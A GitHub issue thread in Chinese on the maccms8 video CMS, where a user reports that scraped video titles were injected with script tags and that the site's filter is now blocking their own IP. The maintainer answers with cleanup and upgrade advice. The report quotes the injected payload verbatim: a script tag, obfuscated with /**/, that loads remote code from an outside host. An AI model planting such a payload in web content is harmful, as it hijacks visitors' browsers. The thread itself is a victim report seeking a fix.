### ISSUE TITLE
影片标题被插入代码

### ISSUE THREAD

**Issue by hkcalm** [magicblack/maccms8#7]
影片标题在采集的时候被插入<script/**/src=https://ssaa.cc/uploads/ver.txt><script/**/src=https://ssaa.cc/uploads/ver.txt>
然后打开主页多次就显示

您的提交带有不合法参数,谢谢合作!
操作IP: 58.23.13.240
操作时间: 2019-12-18 09:45:24
操作页面:/index.php
提交方式: GET

导致主页一直打不开，麻烦大佬处理一下

**Comment by magicblack** [comment]
进入后台 数据库管理，挂马清理。 
升级到最新版本。

**Comment by hkcalm** [comment]
已经最新版本

**Comment by hkcalm** [comment]
应该是资源站没有更新，导致我采集的资源中招，然后就是我打开主页，一直提示封IP的状态

**Comment by magicblack** [comment]
新版本采集的时候已经过滤了 所有文本字段的html元素，按说资源站被挂马采集过来 也过滤了。

**Comment by hkcalm** [comment]
我自己在自己的资源里插入也是没成功。但是自动采集的时候竟然出现了。所以来咨询下大佬您

**Comment by hkcalm** [comment]
再请问下，自己的站访问一直提示

您的提交带有不合法参数,谢谢合作!
操作IP: 58.23.13.240
操作时间: 2019-12-18 10:10:23
操作页面:/index.php
提交方式: GET
这个怎么解决呢，我没有提交非法参数。从8点一直封到现在了

**Comment by magicblack** [comment]
定时任务的话，是另外一个脚本也需要升级呢。 新版本包里都是过滤掉的呢。
inc/timming/clloect.php 
可以联系Potato号magicblack
